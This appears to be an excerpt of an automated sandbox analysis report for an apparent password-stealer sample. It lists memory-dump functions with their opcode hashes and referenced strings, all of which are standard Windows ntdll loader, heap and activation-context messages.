                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-204845295
                            • Opcode ID: 52eed2c749b668a208684210cb65f2a76f5e43d2637a14de800fe31ccb93e54b
                            • Instruction ID: 7a2a334c91657c76abbfc52a6a3923b25d837af494f26e36accb7b21e1169412
                            • Opcode Fuzzy Hash: 52eed2c749b668a208684210cb65f2a76f5e43d2637a14de800fe31ccb93e54b
                            • Instruction Fuzzy Hash: 375111312483009FD721DF24C841FABBBE8FB94648F86091EF5999B1B5D770E944CB92
                            Function 014E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • RtlGetAssemblyStorageRoot, xrefs: 01522160, 0152219A, 015221BA
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01522178
                            • SXS: %s() passed the empty activation context, xrefs: 01522165
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0152219F
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01522180
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015221BF
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            • API String ID: 0-861424205
                            • Opcode ID: ae411df427e57634da3db784acd7a76dfc70c059a9984c127c651c49c20b756e
                            • Instruction ID: 988f5b77da39e4489ee4c14a288a47bdb4192b037a467266880713f93cb3ef1b
                            • Opcode Fuzzy Hash: ae411df427e57634da3db784acd7a76dfc70c059a9984c127c651c49c20b756e
                            • Instruction Fuzzy Hash: 82310B3BF4022577FB119A958C45F6B7BACEB95A51F15005BFA04AF260D2B09A01C7A1
                            Function 014EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 01528177, 015281EB
                            • minkernel\ntdll\ldrredirect.c, xrefs: 01528181, 015281F5
                            • minkernel\ntdll\ldrinit.c, xrefs: 014EC6C3
                            • Loading import redirection DLL: '%wZ', xrefs: 01528170
                            • LdrpInitializeProcess, xrefs: 014EC6C4
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 015281E5
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            • Opcode ID: fb76356a97480053a14fc82854484c3b121ee5b6c234e339f1cc9a6612527f97
                            • Instruction ID: 4113149b68e8aa43a50511e00896419f5a9e77528e738f2269fdc6ed1a58dcf0
                            • Opcode Fuzzy Hash: fb76356a97480053a14fc82854484c3b121ee5b6c234e339f1cc9a6612527f97
                            • Instruction Fuzzy Hash: CB3104726443529FC220EF29D846E2BBBD5FFA5B14F05051DF9446F2A1D670EC04CBA2
                            Function 014F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 014F2DF0: LdrInitializeThunk.NTDLL ref: 014F2DFA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BA3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BB6
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D60
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D74
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                            • String ID:
                            • API String ID: 1404860816-0
                            • Opcode ID: 5a33f72d0192f2cbb0170173f260bd434c06052839f823a0fea0d6a3b683e158
                            • Instruction ID: 2f3dd6687f80b235cd611f87d1741c1b5292f1b1cc97a83231e146d193e5dbd5
                            • Opcode Fuzzy Hash: 5a33f72d0192f2cbb0170173f260bd434c06052839f823a0fea0d6a3b683e158
                            • Instruction Fuzzy Hash: 25425A72900715DFDB21CF28C880BAAB7F5BF54314F1445AEEA899B352D770AA85CF60
                            Function 014BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            • API String ID: 0-379654539
                            • Opcode ID: 6536af59ae7c172f8b0d87d01e332dfe27947a0c5a5f5038051f96e88fa36357
                            • Instruction ID: 7cfd1c74f7df09678596eec73d3c170da16ca3a5d613304c8a26a71573ad5da7
                            • Opcode Fuzzy Hash: 6536af59ae7c172f8b0d87d01e332dfe27947a0c5a5f5038051f96e88fa36357
                            • Instruction Fuzzy Hash: DAC19D74108386DFD711CF58C184BAAB7E4BF84704F24496EF9958B361E738CA4ACB66
                            Function 014E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                            Download Yara Rule
                            Strings
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014E855E
                            • @, xrefs: 014E8591
                            • minkernel\ntdll\ldrinit.c, xrefs: 014E8421
                            • LdrpInitializeProcess, xrefs: 014E8422
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1918872054
                            • Opcode ID: 1aad77aad74bf339805523154fae6bcc42d994ccb1ece7f557f49f35ef940521
                            • Instruction ID: 320556a30bf2fc4826e0cf78364f900b1c97752f1956bd00e8364eb753768c0e
                            • Opcode Fuzzy Hash: 1aad77aad74bf339805523154fae6bcc42d994ccb1ece7f557f49f35ef940521
                            • Instruction Fuzzy Hash: DF919D71518346AFDB21DF66CC44EAFBAE8FF94644F40092FFA8496261E770D904CB62
                            Function 014E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • SXS: %s() passed the empty activation context, xrefs: 015221DE
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015222B6
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015221D9, 015222B1
                            • .Local, xrefs: 014E28D8
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            • Opcode ID: 86028cb88b76fb190f2e3ef3ded78da8002c27e6859a695048ae531911b49113
                            • Instruction ID: a106cbb7d796f92d1c3b282963ddf59882245475389e50ffc5c065a347cc2372
                            • Opcode Fuzzy Hash: 86028cb88b76fb190f2e3ef3ded78da8002c27e6859a695048ae531911b49113
                            • Instruction Fuzzy Hash: C5A1C335A00229DBDB24CF59CC88BAAB7F5BF59314F1541EAD908AB361D7709E81CF90
                            Function 014E4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0152342A
                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01523437
                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01523456
                            • RtlDeactivateActivationContext, xrefs: 01523425, 01523432, 01523451
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                            • API String ID: 0-1245972979
                            • Opcode ID: ccd682c1db46b602762d131bec557a6a4a390d0e8a11b15be3165069a435728d
                            • Instruction ID: 7ebc25b82d1ce2c18031adf7114db95c890f7855aad52b5a7fac1bfa7fcdfa18
                            • Opcode Fuzzy Hash: ccd682c1db46b602762d131bec557a6a4a390d0e8a11b15be3165069a435728d
                            • Instruction Fuzzy Hash: EF6113326007129FDB228F19C849B2AB7E1BB94B11F19856EE9559F3A0D734E801CBD1
                            Function 014B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                            Download Yara Rule
                            Strings
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01510FE5
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0151106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015110AE
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01511028
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            • API String ID: 0-1468400865
                            • Opcode ID: 1ca19d378c7792b4b3872cf5e10e074c7bd1d210c20bee784cd4556305b1c319
                            • Instruction ID: f7479d910efa230ed0855deb3fffcb634093363fce32784667e7f40787f45285
                            • Opcode Fuzzy Hash: 1ca19d378c7792b4b3872cf5e10e074c7bd1d210c20bee784cd4556305b1c319
                            • Instruction Fuzzy Hash: D871E0B19043059FCB21DF15C8C5F9B7BA8AFA4754F41046EF9488B2A6D334D199CBE2
                            Function 014D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                            Download Yara Rule
                            Strings
                            • apphelp.dll, xrefs: 014D2462
                            • minkernel\ntdll\ldrinit.c, xrefs: 0151A9A2
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0151A992
                            • LdrpDynamicShimModule, xrefs: 0151A998
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-176724104
                            • Opcode ID: afe2dbbb77a470752d5dae123f8397a125281b6805fe2c7f45c2a4afdece8114
                            • Instruction ID: c5eb1a603a95b79a8778f5af36cc6ce84c42bac0e02d1aa574fdc31ef39f833c
                            • Opcode Fuzzy Hash: afe2dbbb77a470752d5dae123f8397a125281b6805fe2c7f45c2a4afdece8114
                            • Instruction Fuzzy Hash: AF317D72640242ABEB339F5DC881E6EBBB5FB84704F57001EE9106F259C7B05985D740
                            Function 014C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                            Download Yara Rule
                            Strings
                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014C327D
                            • HEAP: , xrefs: 014C3264
                            • HEAP[%wZ]: , xrefs: 014C3255
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                            • API String ID: 0-617086771
                            • Opcode ID: 15c16cf999e09f1d2ad9009be9dc2674ce6f2b146070280338e2a4f735196f60
                            • Instruction ID: 99a4074fac1f375ff425ea2c3531647d8c142905d9a8c5ebed8d86032c7be25b
                            • Opcode Fuzzy Hash: 15c16cf999e09f1d2ad9009be9dc2674ce6f2b146070280338e2a4f735196f60
                            • Instruction Fuzzy Hash: 7692E078A042499FDB65CF68C440BAEBBF1FF48710F14806EE859AB361D7B5A942CF50
                            Function 014C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            • Opcode ID: 7ca310f9c4a08addd2e541f2522d1cd22059e21812fed30c11ca31ccf7046061
                            • Instruction ID: 67f59ed5cc42801d05230a552e0e263aedb46d7399ac3cea2cfcff81cca9ec73
                            • Opcode Fuzzy Hash: 7ca310f9c4a08addd2e541f2522d1cd22059e21812fed30c11ca31ccf7046061
                            • Instruction Fuzzy Hash: 25F1C038600606DFEB26CF68C890BAAB7F5FF85700F14816EE5569B365D734E981CB90
                            Function 014D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@
                            • API String ID: 0-1077428164
                            • Opcode ID: 8dc4567d53496c31a483810ff59047d9b99b9d338c17ad541efed833003e1354
                            • Instruction ID: 7e5dda7da51d59dfe674d3d2b1f9bba8bc14ef8e11a1efef9ec15a0e5e870d2d
                            • Opcode Fuzzy Hash: 8dc4567d53496c31a483810ff59047d9b99b9d338c17ad541efed833003e1354
                            • Instruction Fuzzy Hash: 12C290716083419FEB26CF29C490BABBBE5BF88714F05892EF98987361D735D805CB52
                            Function 014AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            • Opcode ID: cd1b4ed958f9db37d649ca709a721a4cedeb2feb8d4b70998077b215cd23247e
                            • Instruction ID: 6acf9be99f6e96ac920543672bd101a97621859f7841f7af078affafde101792
                            • Opcode Fuzzy Hash: cd1b4ed958f9db37d649ca709a721a4cedeb2feb8d4b70998077b215cd23247e
                            • Instruction Fuzzy Hash: EEA16D319112299BDB329F64CC88BEEB7B8FF55700F1101EAEA08AB250D7359E84CF50
                            Function 014D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                            Download Yara Rule
                            Strings
                            • LdrpCheckModule, xrefs: 0151A117
                            • minkernel\ntdll\ldrinit.c, xrefs: 0151A121
                            • Failed to allocated memory for shimmed module list, xrefs: 0151A10F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-161242083
                            • Opcode ID: f1d8ad60888bdd962a42757b8531de4d1835f067a3716ffa27f5213d394c88f3
                            • Instruction ID: bd3b9e520d0fcd5989641f4d96397b6a44ac7cfac48cf12c131e65b8d50be14d
                            • Opcode Fuzzy Hash: f1d8ad60888bdd962a42757b8531de4d1835f067a3716ffa27f5213d394c88f3
                            • Instruction Fuzzy Hash: 5871F270A402069FDF2ADF69C890ABEB7F4FB84704F55402EE5169B365E330A946CB50
                            Function 014C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-1334570610
                            • Opcode ID: 85cf7f159f738681e15ebba6bc724e2a9795509692774b460a566cac69704593
                            • Instruction ID: eaf758eecd583632b640c1d5d4814e3de91f3af478119f3762a43abd355db8d2
                            • Opcode Fuzzy Hash: 85cf7f159f738681e15ebba6bc724e2a9795509692774b460a566cac69704593
                            • Instruction Fuzzy Hash: 3D61C178610302DFEB69CF28C480B6ABBE1FF55B04F14855EE4558F2A6E770E881CB91
                            Function 014EC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 015282E8
                            • Failed to reallocate the system dirs string !, xrefs: 015282D7
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 015282DE
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            • Opcode ID: fb4e9bce6547a1fe762f56ad22d46301fcdde5b03cec35e8d8d4c0b698c8b2f0
                            • Instruction ID: 03964858199d38b8edb5b360cf3bcb645799cfb209f66cabe1623f7e43d124a5
                            • Opcode Fuzzy Hash: fb4e9bce6547a1fe762f56ad22d46301fcdde5b03cec35e8d8d4c0b698c8b2f0
                            • Instruction Fuzzy Hash: FA41F272584312ABC720EB69D884B5F7BE8BF65B50F46482FF9549B2A0E770D8048B91
                            Function 0156C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            • PreferredUILanguages, xrefs: 0156C212
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0156C1C5
                            • @, xrefs: 0156C1F1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            • Opcode ID: f458d208f417760f0c055ef082b6f321501c9274ff8160b0ad1ea4232ec25dbf
                            • Instruction ID: 55c48db9d241afaf3bf525043dbdfdf8bc1ae709c3bf804b88c459a901ba9a74
                            • Opcode Fuzzy Hash: f458d208f417760f0c055ef082b6f321501c9274ff8160b0ad1ea4232ec25dbf
                            • Instruction Fuzzy Hash: 77416571E00209EBDF11DED9C851FEEBBBCBB24714F14406BEA85AB250D7749A44CB90
                            Function 01544144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            • Opcode ID: db864628aa8c68678832397fbe5a7f15e9679cd8d0385665989215daee1893bd
                            • Instruction ID: e5b7f99141132102b4788105b19ee8db25133a6e9111b6efaca3f076a02780a7
                            • Opcode Fuzzy Hash: db864628aa8c68678832397fbe5a7f15e9679cd8d0385665989215daee1893bd
                            • Instruction Fuzzy Hash: 3741FF72A446498BEB22DFA9C844BADBBB8FFA5748F14045AD901AF791DB348901CB10
                            Function 01534755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 01534899
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01534888
                            • LdrpCheckRedirection, xrefs: 0153488F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            • Opcode ID: b7d3a4c5f979706ed3847d990d9b09d13fd40c96a1b71514e24e516ffccf5848
                            • Instruction ID: b886f82ef08ff62db02068cd709699af99b20af390dd1947e4c6aa5ce1cd2e88
                            • Opcode Fuzzy Hash: b7d3a4c5f979706ed3847d990d9b09d13fd40c96a1b71514e24e516ffccf5848
                            • Instruction Fuzzy Hash: BF41AF32A146519FCB22CE69D840A2ABBE4BFC9B50B06056DED589F352E730E811CB91
                            Function 014C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-2558761708
                            • Opcode ID: 422efc2f8a0401ce0617cea6c5249a96079aa1afb3bcc9bcf823a3877fb77281
                            • Instruction ID: 42d84bff129d789081f16dd94e2b4998bd27bc937f8099209205dfe62ead0c4f
                            • Opcode Fuzzy Hash: 422efc2f8a0401ce0617cea6c5249a96079aa1afb3bcc9bcf823a3877fb77281
                            • Instruction Fuzzy Hash: 9311F0393A4102DFE76ADA18C440B6AB3A4FF91A15F19801EF4068F269EB70D841C740
                            Function 015320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 01532104
                            • Process initialization failed with status 0x%08lx, xrefs: 015320F3
                            • LdrpInitializationFailure, xrefs: 015320FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            • Opcode ID: b51dd5491c7eb571bc0317dd940bf173bb4d8675087fc21991a4d02ba3a6145b
                            • Instruction ID: 6a2fdf6efe337ec44f998b6ad8dc15cc675ab3ab0598f54b32752b40bf2920bd
                            • Opcode Fuzzy Hash: b51dd5491c7eb571bc0317dd940bf173bb4d8675087fc21991a4d02ba3a6145b
                            • Instruction Fuzzy Hash: CBF0C835680309BBEB24E64DCD46F9A7B68FB80B54F61005EF6006F295D6F0A504D691
                            Function 014C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            • API String ID: 48624451-232158463
                            • Opcode ID: eaae58c2785a6f84fed40bb13385a0f6440fbb986538dce1ffa332e7768871d4
                            • Instruction ID: 8c5737bf09bd2a5f522cc8555eddd9ec183ef035726dd8d6c3799ec55b3bcbdb
                            • Opcode Fuzzy Hash: eaae58c2785a6f84fed40bb13385a0f6440fbb986538dce1ffa332e7768871d4
                            • Instruction Fuzzy Hash: 72715E75A0014A9FDB01DF99C990BAEB7F8BF58704F15406AE905EB261E734ED01CBA4
                            Function 014BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                            Download Yara Rule
                            Strings
                            • LdrResSearchResource Exit, xrefs: 014BAA25
                            • LdrResSearchResource Enter, xrefs: 014BAA13
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                            • API String ID: 0-4066393604
                            • Opcode ID: e50e83d8f6aba39855575185ddede91ad25ff80623de78a4d9fc5dfd3c3dda68
                            • Instruction ID: 385c4d27573a2b018e3b9aefdebae7f2f7990825a8efeecf310b41b5432765c7
                            • Opcode Fuzzy Hash: e50e83d8f6aba39855575185ddede91ad25ff80623de78a4d9fc5dfd3c3dda68
                            • Instruction Fuzzy Hash: BFE18771E042159FEF22CE99C990BEEBBB9FF58310F20442AE911EB265D734D941CB60
                            Function 0157A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction ID: 4ca8b8ef4516a435cd3e12735cb3c1ec722d655713033190ea4d1a9998c48885
                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction Fuzzy Hash: 80C1CF312043429BEB24CF29D846B2FBBE6BFD4318F084A2DF6968B290D7B5D505CB51
